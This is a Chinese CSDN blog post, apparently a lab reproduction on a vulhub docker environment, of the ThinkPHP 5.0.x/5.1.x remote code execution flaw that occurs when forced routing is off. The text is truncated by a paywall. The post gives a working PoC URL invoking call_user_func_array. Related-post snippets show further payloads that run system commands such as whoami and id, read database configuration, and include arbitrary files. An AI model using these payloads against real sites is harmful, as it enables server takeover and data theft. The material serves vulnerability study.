[漏洞复现]ThinkPHP 5.0.x 未开启强制路由导致的RCE

最新推荐文章于 2024-08-07 18:27:39 发布
最新推荐文章于 2024-08-07 18:27:39 发布
阅读量744 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: php thinphp rce 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/117080616
版权

ThinkPHP 5.0.x 未开启强制路由导致的RCE

影响版本:

ThinkPHP 5.0.5-5.0.22

ThinkPHP 5.1.0-5.1.30

环境:

vulhub-master/thinkphp/5-rce

启动docker环境之后访问:

这个的版本是ThinkPHP 5.0.20版本:

http://ip:8080/

image-20210520144849763

POC:

http://192.168.17.134:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

image-20210520145023735

分析

5.0版本跟5.1版本 有些不同。

首先,默认情况下安装的 ThinkPHP 没有开启强制路由选项,而且默认开启路由兼容模式。

由于没有开启强制路由,说明我们可以使用路由兼容模式 s 参数,而框

最低0.47元/天 解锁文章
wwxxee
关注
专栏目录
ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6149
第一次进行代码量这么大的分析,记录一下,个人感觉新手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5的RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
代码审计之ThinkPHP 5.0-5.0.23RCE
m0_63581584的博客
11-23 648
2.2,回到app->run方法中。调用call_user_func(),造成RCE。2.1 第一步造成变量覆盖。进入App-run()方法。这里debug开启,即进入。2.开始进行RCE分析。
Thinkphp5开启强制路由导致RCE 漏洞复现与分析
xiaolong22333的博客
09-28 947
影响版本 小于5.0.23 小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&
Thinkphp5x远程执行命令及getshell
最新发布
2201_75891821的博客
08-07 494
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 802
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
thinkphp5-rce
shierbai的博客
05-17 481
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
thinkphp5 rce
weixin_51558394的博客
08-17 473
thinkphp5 rce
ThinkPHP5代码审计【开启强制路由导致RCE
D.MIND 的博客
05-13 1864
文章目录简介环境搭建分析payload修复 简介 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 环境搭建 以5.1.29作为演示: composer create-project --prefer-dist topthink/think=5.1
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心构造,从而实现远程代码执行。 #### 环境准备与复现 为了更好地理解该漏洞,建议...
[代码审计]ThinkPHP 5.0.x 变量覆盖导致RCE分析
Huamang的博客
11-26 5496
前言 漏洞存在版本,分为两大版本: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 环境搭建 composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist 修改composer.json "require": { "php": ">=5.4.0", "topthink/framework": "5.0.5" }, 执行composer update
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6539
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1497
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 937
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
thinkphp5RCE
weixin_45778886的博客
03-07 1903
这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后,进入self::exec函数2.1 跟进exec函数2.2R
ThinkPHP V5的RCE(远程代码执行漏洞
Home to come
04-18 2123
一、Shell脚本基础知识 1.Shell 输入/输出重定向 常见重定向符号: 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C:恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容(tr set1 [set2])char(字符:一个...
学习笔记-ThinkPHP5任意方法调用RCE
人饭子的博客
11-09 766
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 452
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
ThinkPHP5.0.5RCE
1stPeak's Blog
08-06 981
访问 http://xx.xx.xx.xx:8080/index.php/?s=captcha payload: _method=__construct&filter[]=system&method=GET&get[]=系统命令 示例如下: post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行 post传入_method=__construct&filter
Thinkphp 5.0.x-5.1.x 变量覆盖RCE漏洞深度解析
ThinkPHP 5.0.x 和 5.1.x 版本的变量覆盖 Remote Code Execution (RCE) 漏洞分析是一篇关于ThinkPHP框架安全问题的文章,由作者whip1ash在2019年发布。文章指出,在这些早期版本中,存在一个可能导致恶意代码执行的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值